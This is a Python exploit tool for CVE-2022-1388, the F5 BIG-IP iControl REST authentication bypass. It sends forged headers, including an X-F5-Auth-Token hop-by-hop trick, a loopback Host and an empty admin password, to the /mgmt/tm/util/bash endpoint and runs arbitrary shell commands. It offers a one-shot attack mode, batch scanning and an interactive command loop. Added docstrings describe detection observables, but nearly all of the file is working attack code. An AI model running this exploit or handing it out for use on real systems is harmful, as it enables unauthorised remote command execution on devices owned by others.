CVE-2022-1388.py
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Suppress urllib3's InsecureRequestWarning. Every request in this file is sent
# with verify=False, so server certificates are never validated and the
# warning would otherwise be printed for each call.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Start-up time in whole seconds; not referenced by any function in this file.
t = int(time.time())
def title():
    """Print the ASCII-art banner, the author credits and the usage summary.

    The usage text (in Chinese) lists the four command-line modes handled by
    main(): verify (-v), attack (-a), batch check from a file (-s) and the
    interactive "WebShell" loop (-r).
    """
    # The banner is a normal (non-raw) string: a doubled backslash prints as
    # one backslash and a backslash at the end of a line joins it to the next
    # line, so the art is not printed exactly as it appears here.
    print('''
_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ |
| / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V /
| | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \
| \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
\____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____/\_____/
Author:Caps@BUGFOR
Github:https://github.com/bytecaps
Remaker:LinJacck
Github:https://github.com/LinJacck
''')
    print('''
验证模式:python CVE_2022_1388.py -v -u target_url
攻击模式:python CVE_2022_1388.py -a -u target_url -c command
批量检测:python CVE_2022_1388.py -s -f file
WebShell模式:python CVE_2022_1388.py -r -u target_url
注:如果“验证模式”显示疑似漏洞但无法利用,说明系统已更改默认密码无法未授权攻击。
''')
def headers():
    """Return a fresh dict of the fixed HTTP headers used for command requests.

    Detection note: this header set is the request fingerprint of the
    CVE-2022-1388 tooling on this page. The `Connection` header names
    `X-F5-Auth-Token`, an `X-F5-Auth-Token` header is present, `Host` is a
    loopback address, and the Basic credential 'YWRtaW46' decodes to 'admin:'
    (user admin, empty password). Requests to the BIG-IP management API that
    carry this combination are worth alerting on and blocking upstream.
    """
    fixed_fields = [
        ('Host', '127.0.0.1'),
        ('User-Agent', "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"),
        ('Content-Type', 'application/json'),
        ('Connection', 'X-F5-Auth-Token'),
        ('X-F5-Auth-Token', '0'),
        ('Authorization', 'Basic YWRtaW46'),
    ]
    # A new dict is built on every call, so callers cannot affect each other.
    return dict(fixed_fields)
def check(url):
    """Probe *url* and print whether the reply looks like BIG-IP iControl REST.

    Sends a single GET to ``/mgmt/shared/authn/login`` and looks for the
    substring ``resterrorresponse`` in the body. Nothing is returned; the
    verdict is printed.

    NOTE(review): the marker looks like a generic REST error body, so a match
    probably shows only that the management REST interface is reachable, not
    that the device is unpatched. Confirm against the installed version and
    the vendor advisory before treating a "[+]" line as a finding, and do not
    treat a "[-]" line as proof that a host is safe.
    """
    try:
        # verify=False: the server certificate is not validated.
        reply = requests.get(url + "/mgmt/shared/authn/login", verify=False, timeout=3)
        if "resterrorresponse" in reply.text:
            verdict = "[+] 目标 {} 疑似存在漏洞"
        else:
            verdict = "[-] 目标 {} 不存在漏洞"
        print(verdict.format(url))
    except Exception:
        # Any failure (bad URL, timeout, TLS error, ...) gets the same message.
        print('url 访问异常 {0}'.format(url))
def attack(target_url, cmd):
    """POST one command to the bash utility endpoint and print the outcome.

    The request goes to ``/mgmt/tm/util/bash`` with the header set from
    headers() and a JSON body whose ``command`` is ``run``. Nothing is
    returned; the result is printed.

    Detection note: a POST to this path with that JSON shape and header set,
    arriving from outside the management network, is the observable to alert
    on. Restricting access to the management interface and installing the
    fixed release are the mitigations to verify.
    """
    attack_url = target_url + '/mgmt/tm/util/bash'
    # cmd is placed between single quotes with no escaping.
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        # verify=False: the server certificate is not validated.
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            # Any other status or body is reported as "not vulnerable", which
            # also covers requests dropped or rewritten by an upstream filter.
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        # Connection errors and JSON decoding errors get the same message.
        print('url 访问异常 {0}'.format(target_url))
def reverse_shell(target_url):
    """Read commands from stdin in a loop and POST each one to the bash endpoint.

    Despite the name, no reverse connection is opened: each input line becomes
    one separate HTTPS POST to ``/mgmt/tm/util/bash``, so every command shows
    up as its own request in network and device logs. Typing ``exit`` ends
    the loop.
    """
    print("[+] 下方输入命令便可持续执行,输入exit退出。")
    reverse_url = target_url + '/mgmt/tm/util/bash'
    while 1:
        CmdData = input("Break> ")
        if CmdData == "exit":
            break
        # The input is placed between single quotes with no escaping.
        data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(CmdData)}
        # No try/except here: a timeout, a non-JSON body or a reply without
        # 'commandResult' raises and ends the loop with a traceback.
        response = requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
        default = json.loads(response.text)
        display = default['commandResult']
        print(display)
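def scan(file):
    """Run check() on every non-blank line of the UTF-8 text file *file*.

    Each line is stripped, normalised with format_url() and passed to check(),
    which prints its own verdict. check() only fingerprints the REST login
    endpoint, so the output is a list of hosts to review, not a list of
    confirmed findings.

    The file is opened in a ``with`` block so the handle is closed when the
    loop ends or an error propagates; the original left it open.
    """
    with open(file, 'r', encoding='utf-8') as listing:
        for raw_line in listing:
            entry = raw_line.strip()
            if entry:
                check(format_url(entry))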
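def format_url(url):
    """Return *url* stripped of surrounding whitespace and with a scheme.

    ``https://`` is prepended unless the value already starts with
    ``http://`` or ``https://`` (compared case-insensitively).

    Fixes over the original:
    * whitespace is stripped before the scheme test, so a padded host no
      longer ends up as ``https://`` followed by a space;
    * the test looks for a real scheme prefix, so a host name that merely
      begins with ``http`` still gets a scheme, and an upper-case scheme is
      not prefixed a second time.

    Returns None, after printing an error line, when *url* is not a string.
    """
    try:
        url = url.strip()
        if not url.lower().startswith(("http://", "https://")):
            url = "https://" + url
        return url
    except (AttributeError, TypeError):
        print('URL 错误 {0}'.format(url))
        return None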
def main():
    """Parse the command line and dispatch to exactly one mode.

    The modes are tried in this order: verify (-v with -u), attack (-a with
    -u, command defaults to "id"), batch check (-s with -f), interactive loop
    (-r with -u). If no complete combination is given the process exits with
    status 0 without printing anything.
    """
    cli = argparse.ArgumentParser("F5 Big-IP RCE")
    cli.add_argument('-v', '--verify', help=' 验证模式 ', action='store_true', default=False)
    cli.add_argument('-u', '--url', type=str, help=' 目标URL ')
    cli.add_argument('-a', '--attack', help=' 攻击模式 ', action='store_true', default=False)
    cli.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
    cli.add_argument('-s', '--scan', help=' 批量模式 ', action='store_true', default=False)
    cli.add_argument('-f', '--file', type=str, help=' 文件路径 ')
    cli.add_argument('-r', '--shell', help=' WebShell模式 ', action='store_true', default=False)
    opts = cli.parse_args()

    has_url = opts.url is not None

    # Guard clauses in the original priority order; the first match wins.
    if opts.verify is True and has_url:
        check(opts.url)
        return
    if opts.attack is True and has_url and opts.command is not None:
        attack(opts.url, opts.command)
        return
    if opts.scan is True and opts.file is not None:
        scan(opts.file)
        return
    if opts.shell is True and has_url:
        reverse_shell(opts.url)
        return

    # No usable flag combination: exit quietly with status 0.
    sys.exit(0)
# Script entry point: print the banner and usage text, then dispatch on the
# command-line flags. The banner is printed on every run, before parsing.
if __name__ == '__main__':
    title()
    main()